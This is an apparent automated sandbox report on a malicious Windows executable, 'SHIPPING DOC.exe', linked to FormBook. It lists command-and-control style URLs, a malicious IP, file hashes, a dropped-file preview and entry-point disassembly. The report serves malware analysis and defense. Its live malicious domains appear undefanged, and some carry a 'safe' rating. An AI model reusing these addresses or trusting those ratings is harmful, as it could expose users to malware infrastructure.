                                                                                            http://www.onsfskfsmpfssfpewqdsawqe.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.9net88.net/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.amyard.shopexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.rowadservepros.net/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.eries-htii.xyzReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.ehkd.topReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.giyztm.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.9net88.net/ge07/www.estwestcottwines.shopexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.g18q11a.topexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.hemicans.xyz/ge07/www.croom.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.eries-htii.xyz/ge07/www.isit-txax.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.eries-htii.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.ngeribe2.homes/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.epehr.pics/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://powerpoint.office.comexplorer.exe, 00000008.00000002.3718157848.000000000C0E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C0E6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ivglass.xyz/ge07/www.eries-htii.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.foreca.comexplorer.exe, 00000008.00000002.3708193539.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.onsfskfsmpfssfpewqdsawqe.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.rowadservepros.net/ge07/www.giyztm.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.9net88.netexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.rowadservepros.netReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.amyard.shop/ge07/www.ivglass.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.estwestcottwines.shop/ge07/explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.ngeribe2.homesReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://api.msn.com/explorer.exe, 00000008.00000003.3077610962.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.epehr.picsReferer:explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.ivglass.xyzexplorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    50.28.1.56
                                                                                                                    croom.netUnited States
                                                                                                                    32244LIQUIDWEBUStrue
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1549885
                                                                                                                    Start date and time:2024-11-06 08:05:03 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 42s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:17
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Sample name:SHIPPING DOC.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.evad.winEXE@1032/1@12/1
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    • Number of executed functions: 51
                                                                                                                    • Number of non-executed functions: 303
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    TimeTypeDescription
                                                                                                                    02:06:15API Interceptor7151878x Sleep call for process: explorer.exe modified
                                                                                                                    04:01:49API Interceptor6371392x Sleep call for process: colorcpl.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    50.28.1.56New Order 72821.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.croom.net/ge07/?iFNDnr8X=RnhvF68weDYT8LWijfVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXIIuvcLMiXro&otx=V4Rx3dyh
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    94950.bodis.comPurchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.59.243.227
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    LIQUIDWEBUSAENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                    • 72.52.178.23
                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                    • 72.52.178.23
                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 72.52.178.23
                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 72.52.178.23
                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 72.52.178.23
                                                                                                                    jklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 96.30.37.143
                                                                                                                    nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 50.28.115.41
                                                                                                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 192.138.18.212
                                                                                                                    https://nt3e.com/_1.html?%20send_id=eh&tvi2_RxT=www.networksolutionsemail.com/ntpdkptJegwgUbePDCPPdVkFuvAlhtlBYyzZldVkFuvAlhtlBYyzZlPwcjpjmntpdkptJegwgUbePDCPPdVkFuvAlhtlBYyzZlntpdkptJegwgUbePDCPPdVkFuvAlhtlBYyzZl&e=cnlhbl9ob3dhcmRAb3V0bG9vay5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 67.225.176.91
                                                                                                                    Scan copy of document .pdfGet hashmaliciousUnknownBrowse
                                                                                                                    • 209.59.182.25
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):189440
                                                                                                                    Entropy (8bit):7.881650001606748
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:L+/Cu2kVDeZ0+mMNg5QfvlecTK8vt8I09rAUoFWtg0EGxS2P+622+PHm9DLGq7LT:LACu2kGmMNg5QfvleT8hUoaEASZDEDLX
                                                                                                                    MD5:3271111AB6C789EC6708290E4008BAD8
                                                                                                                    SHA1:B140F2D7236E4D15CA6107BB554D7766B99A360A
                                                                                                                    SHA-256:EAF393D0E64A93074C882ED23328956E8FA4F537AB6E9A7683441D86A7998953
                                                                                                                    SHA-512:3C62A6936821C6ABEF073706D6E03B32BD7CC362551C593A4F953005566E699F4EE1A175F651BA6DEEA6F06737096F61507AA43050586B7D34221F0AA4DFCA0C
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.j...7TQY..X....k.WH..lO>...Y0KEB7TQYSDZQN6H8W3WKMSFDL6IMW.0KEL(._Y.M.p.7..vg?">s66#Q;,:yS*+,X q;6d($ .!Vww..m>) ).D@]}0KEB7TQ.L...P...U..5..L....?..E....?.Z....^.a>(%..".6IMWY0KEB7TQYSDZ..6HtV2W..:.DL6IMWY0.E@6_PSSD.SN6H8W3WKM#.EL6YMWY.IEB7.QYCDZQL6H=W2WKMSFAL7IMWY0K.@7TSYSDZQN4Hx.3W[MSVDL6I]WY KEB7TQISDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3We96>0L6I..[0KUB7T.[SDJQN6H8W3WKMSFDL.IM7Y0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYSDZQN6H8W3WKMSFDL6IMWY0KEB7TQYS
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.354430210834071
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:SHIPPING DOC.exe
                                                                                                                    File size:1'096'093 bytes
                                                                                                                    MD5:f49a779c9194a3b100f591a333b608a6
                                                                                                                    SHA1:4141b908112fed259eca359c0d5be3be0bc8ba14
                                                                                                                    SHA256:51132cd1705668a4b8b716b3169779133de701532821ba4d9cbea174143fceb8
                                                                                                                    SHA512:c745a3afa19bac0a00738f03db1593ae1c0c4815ad77223f7b9a31862383ffe15c939810543c3bd1601698fd1c0d232378ad512f0645d6fb0bd80dced38b3db1
                                                                                                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCmKIvKrY2E2JyH/O59NQU:7JZoQrbTFZY1iaC+EYT2AHG59/
                                                                                                                    TLSH:4735E122F5D59036C1B323B19E7FF36AA63D79360326D29737C82D315EA05416B2A723
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                    Icon Hash:1733312925935517
                                                                                                                    Entrypoint:0x4165c1
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                    Instruction
                                                                                                                    call 00007FC508AF73ABh
                                                                                                                    jmp 00007FC508AEE21Eh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                    mov edi, dword ptr [ebp+08h]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007FC508AEE39Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007FC508AEE536h
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007FC508AEE3AEh
                                                                                                                    cmp dword ptr [004A9724h], 00000000h
                                                                                                                    je 00007FC508AEE3A5h
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    and edi, 0Fh
                                                                                                                    and esi, 0Fh
                                                                                                                    cmp edi, esi
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    jne 00007FC508AEE397h
                                                                                                                    jmp 00007FC508AEE772h
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007FC508AEE3A6h
